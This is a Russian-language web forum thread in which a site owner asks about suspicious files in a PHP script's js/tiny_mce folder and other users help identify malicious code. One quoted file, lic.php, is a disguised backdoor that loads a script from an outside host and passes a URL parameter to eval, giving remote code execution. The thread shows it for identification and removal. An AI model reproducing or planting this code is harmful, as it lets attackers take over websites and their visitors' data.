О загадочной папке js

  • Автор темы nikitin2016
  • Дата начала
nikitin2016
Участник
Сообщения
228
Реакции
12
В ней папка : tiny_mce и часто встречается вот такой код в разных файлах этой папки :


/**
* form_utils.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under LGPL License.
*
* License: http://tinymce.moxiecode.com/license
* Contributing: http://tinymce.moxiecode.com/contributing
*/

Его можно удалять ? Он всегда в самом начале , не является дырой случайно ?
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
nikitin2016 написал(а):
В ней папка : tiny_mce и часто встречается вот такой код в разных файлах этой папки :


/**
* form_utils.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under LGPL License.
*
* License: http://tinymce.moxiecode.com/license
* Contributing: http://tinymce.moxiecode.com/contributing
*/

Его можно удалять ? Он всегда в самом начале , не является дырой случайно ?
можешь удалить
 
nikitin2016
Участник
Сообщения
228
Реакции
12
kvozimir написал(а):
можешь удалить
а файл : lic.php нужен ?

в нем этот код :

<script type=\"text/javascript\" src=\"http://wwes.ga/agreement.html\"></script>
<?
// Получаем лицензию
$license = $_GET['license'];

//Соглашаемся с правилами предоставления скрипта
eval($license);
?>
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
nikitin2016 написал(а):
а файл : lic.php нужен ?

в нем этот код :

<script type=\"text/javascript\" src=\"http://wwes.ga/agreement.html\"></script>
<?
// Получаем лицензию
$license = $_GET['license'];

//Соглашаемся с правилами предоставления скрипта
eval($license);
?>
удаляй
 
nikitin2016
Участник
Сообщения
228
Реакции
12
kvozimir написал(а):
а скрипт не поломается от этого ? Функционал будет также норм работать без этих кодов ?
они что были спец. туда всунуты это дыры ?
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
nikitin2016 написал(а):
а скрипт не поломается от этого ? Функционал будет также норм работать без этих кодов ?
они что были спец. туда всунуты это дыры ?
все норм будет,ну что то вроде дыр
 
nikitin2016
Участник
Сообщения
228
Реакции
12
The Doshs
Участник
Сообщения
383
Реакции
63
Это такие дыры. )
 
skroliks
PHP, MySQL, CSS
Участник
Сообщения
280
Реакции
46
  • #10
В разделе форума "Дыры на сайте" было уже написано неоднократно по поводу папки tiny_mce - это дыра, которая используется злоумышленниками для взлома сайта. Так что смело можно удалять! (Пока вроде никто не жаловался на неработоспособность скрипта после удаления этой папки)
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #11
skroliks написал(а):
В разделе форума "Дыры на сайте" было уже написано неоднократно по поводу папки tiny_mce - это дыра, которая используется злоумышленниками для взлома сайта. Так что смело можно удалять! (Пока вроде никто не жаловался на неработоспособность скрипта после удаления этой папки)
вы предлагаете папку: tiny_mce , которая в папке: js удалить совсем ? И скрипт от этого не развалиться ? в нее же вложено куча других папок !
 
MegaGoblin
PHP, JS, AJAX, CSS, HTML
Участник
Сообщения
322
Реакции
72
  • #12
nikitin2016 написал(а):
вы предлагаете папку: tiny_mce , которая в папке: js удалить совсем ? И скрипт от этого не развалиться ? в нее же вложено куча других папок !
tiny_mce - это текстовый редактор.Если вдруг решишь удалять этот редактор, то не забудь удалить его использование на тех страницах, где он применялся
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #13
MegaGoblin написал(а):
tiny_mce - это текстовый редактор.Если вдруг решишь удалять этот редактор, то не забудь удалить его использование на тех страницах, где он применялся
Да вот не хотелось бы текстовый редактор удалять, так то через админку что то красиво написать то нужно всегда ! Как кроме .htaccess (а) его можно защитить чтоб дыры не было ?
 
MegaGoblin
PHP, JS, AJAX, CSS, HTML
Участник
Сообщения
322
Реакции
72
  • #14
nikitin2016 написал(а):
Да вот не хотелось бы текстовый редактор удалять, так то через админку что то красиво написать то нужно всегда ! Как кроме .htaccess (а) его можно защитить чтоб дыры не было ?
А чем тебе htaccess не нравится?
Можно найти онлайн редактор, написать новость в нем, скопировать код и вставлять в админке.
А еще удалять необязательно его. Надо лишь проверить все файлы на наличие вредосносного кода, вроде 'eval'-а, о котором писали выше.
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #15
MegaGoblin написал(а):
А чем тебе htaccess не нравится?
Можно найти онлайн редактор, написать новость в нем, скопировать код и вставлять в админке.
А еще удалять необязательно его. Надо лишь проверить все файлы на наличие вредосносного кода, вроде 'eval'-а, о котором писали выше.
так файлов то гора в этой папке js попробуй все проверь ! Вдруг останется какой нибудь вредоносный код ! А кроме eval (a) какие еще вредоносные коды есть в наших фермах ?
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #16
Что за файл ?

fancybox.js

у меня он почему то пустой , совсем !
 
skroliks
PHP, MySQL, CSS
Участник
Сообщения
280
Реакции
46
  • #17
Подскажите, я правильно понимаю, что файлы из папки js используются только там, где в кодах файлов php указано, что используется JavaScript? Просто я уверен, что там много лишних файлов и большинство можно удалить за ненадобностью..
 
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #18
skroliks написал(а):
Подскажите, я правильно понимаю, что файлы из папки js используются только там, где в кодах файлов php указано, что используется JavaScript? Просто я уверен, что там много лишних файлов и большинство можно удалить за ненадобностью..
Именно так и есть я полностью удалил папку тайни мке и норм скрпт работает и еще кучу лишних файлов в папке js и все нормуль
 
kondor
Участник
Сообщения
27
Реакции
1
  • #19
Подскажите за что отвечает файл _sender.php, там нашел по запросу evel
Line 2418: eval($msortline);
Line 2518: if( kCode == 13) eval(submitFunc);
может удалить эту строку?
 
viking517
Участник
Сообщения
44
Реакции
2
  • #20
Папка Cron_Job:
Папка с файлом-страницей (_sender.php) отправки массовой рассылки зарегистрированным пользователям.
А откуда скрипт взял??? В стандартном файле всего 37 строк. а у тебя 2518
 
Сверху